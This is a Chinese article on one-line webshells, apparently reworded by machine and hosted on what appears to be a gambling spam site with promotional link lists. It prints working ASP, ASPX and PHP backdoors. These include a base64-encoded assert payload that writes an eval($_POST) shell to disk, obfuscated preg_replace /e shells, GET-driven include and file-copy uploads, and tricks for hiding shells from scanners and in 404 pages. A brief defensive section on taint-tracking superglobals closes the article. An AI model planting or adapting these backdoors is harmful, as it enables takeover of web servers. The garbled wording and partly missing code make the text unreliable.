主页 > 加入2号站 > 正文
一句话木马原理很简略,造型也很简略,所以形成了它了解起来简略,抵挡起来也简略。所所以非的比赛变成了黑帽不断的结构变形的后门,去荫蔽特征,而白帽则不断的更新过滤办法,建起更高的城墙。
一、原理简述
关于不同的言语有不同的结构办法。
根本结构:最最初结构的是脚本开端的符号
中心部分:获取并履行得到的内容,一般相似eval、execute等
被履行内容:一般是http等协议承受的值,一般相似request、$_POST等
假如咱们经过客户端向服务器发送被履行内容,那么就会让服务器履行咱们发送的脚本,挂马就完成了。
/*asp一句话木马*/<%execute(request("value"))%>
/*php一句话木马*/
/*aspx一句话木马*/
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
黑帽子的意图,便是想尽办法给方针网站刺进这么一段会被储存起来的句子。可所以一个独自的脚本文件文件(.asp 、.php、.aspx ),或者是躲藏在某些网页下的文件、代码等。
其间的value 便是客户端要发送的内容,然后经过客户端与服务器树立衔接,发送操控脚本。也会涉及到一些恣意文件上传缝隙等。
二、简略变形
很明显的 eval 能够成为一个静态特征码,webshell扫描东西能够以此为关键词,扫描到这种木马加以屏蔽。所以能够简略变形不呈现eval:
同理,传给a值为 @base64_decode(base64编码往后的eval)。
运用办法:
?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};
经过对GET恳求的URL结构而构成运用,左括号和右括号是URL编码,解码回来如下:
?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};
PHP接收到GET恳求后相当于履行一个assert函数,并把b作为assert的参数。b里边运用略php的base64解码函数,把部分信息经过base64编码而绕过扫描,解码后如下:
?a=assert&b=${fputs(fopen(c.php,w),1)};
履行后当时目录生成c.php文件并写入一句话木马,这现已算是一个十分荫蔽的木马了。而在PHP 后门的变形之路上,远远不止这些,乃至能够自己界说一个加密解密的函数,或者是运用xor, 字符串翻转,紧缩,切断重组等等办法来绕过。
三、变形改进
1.404页面躲藏木马
Not Found
The requested URL was not found on this server.
一般404页面放好后,很少有人会定时对404页面进行检查和修正。
假如在404页面挂上了一句话后门,一方面不会被发现,另一方面,黑帽子很简略能定位到并衔接上服务器。
2.无特征躲藏PHP后门
运用session:
运用$_SEESION变量来绕过扫描,将$_POST['code']赋值给$_SESSION['theCode'],然后eval履行SESSION的内容。
运用HTTP_REFERER:
运用恳求中的HTTP_REFERER来运转经过base64编码的代码,到达后门的作用,运用两个文件。
$url,
CURLOPT_HEADER => FALSE,
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_REFERER => $referer
];
curl_setopt_array($ch, $options);
echo curl_exec($ch);
拜访2.php,会结构一个会话,进到后门1.php那里。然后在HTTP_REFERER 的内容也会传递给1.php,经过1.php 履行内容。一般来说,防火墙会对 referer字段宽松一些,就可形成绕过。
3.常见的后门
//菜刀一句话
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//风险的include函数,直接编译任何文件为php格局运转
$filename=$_GET['xbid'];
include ($filename);
//重命名任何文件
$reg="c"."o"."p"."y";
$reg($_FILES['MyFile']['tmp_name'],$_FILES['MyFile']['name']);
//菜刀一句话
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//gif插一句话
//风险的include函数,直接编译任何文件为php格局运转,
POST
include ($uid);
//典型一句话
//运用lanker一句话客户端的专家形式履行相关的php句子
//运用这个后,运用菜刀一句话客户端在装备衔接的时分在"装备"一栏输入
h=@eval_r($_POST1);
//绕过@eval_r($_POST[sb])
四、攻防
攻方:运用各式各样的绕过姿态,都是企图让扫描东西无效。
守方:剖析各式各样的函数,寻觅有用的特征码来避免后门。
黑帽子大牛:深化web结构内核,挖掘出代码缺点,结构出杂乱的后门运用。
安全审计人员:对那些经过GET,POST 获取的超全局变量,进行详尽的追寻,结构适宜的过滤器。
语义剖析:对GET POST 等获取的值进行污染点追寻,以保证这些用户可控的值,不会未经过滤就得到了履行,或是进入数据库中。
针对超全局变量进行语义剖析:
$_GET
$_POST
$_REQUEST
$_SERVER
$_FILES
$_COOKIE
$_SESSION
$_ENV
$GLOBALS
猜你喜欢
- 2020-05-23 05:24:40 二号站登录测速_「金华seo公司要找10火星」 SEO外
- 2020-05-20 05:24:47 2号站电脑版登陆_「seo手机点击排名 si」 seo排名
- 2020-05-18 05:24:58 二号站苹果app下载_「北京seo软件知名乐云seo品牌
- 2020-04-28 05:24:36 二号站登录测速_「昆明seo讲师董辉」 请问昆明
- 2号站主管Q:2347-660
-
- 10-31test
- 10-27凤凰二号站代理_新闻详情
- 10-27二号站主管注册_新闻详情
- 10-26二号站登录网址_新闻详情
- 10-26凤凰二号站官网_新闻详情
- 10-25凤凰联盟二号站_新闻详情
- 10-242号站_新闻详情
- 10-23二号站电脑测速_新闻详情
- 10-22二号站直属代理注册_新闻详情
- 10-21二号站苹果手机版下载_新闻详情
- 10-31test
- 10-27凤凰二号站代理_新闻详情
- 10-27二号站主管注册_新闻详情
- 10-26二号站登录网址_新闻详情
- 10-26凤凰二号站官网_新闻详情
- 10-25凤凰联盟二号站_新闻详情
- 10-242号站_新闻详情
- 10-23二号站电脑测速_新闻详情
- 10-22二号站直属代理注册_新闻详情
- 10-21二号站苹果手机版下载_新闻详情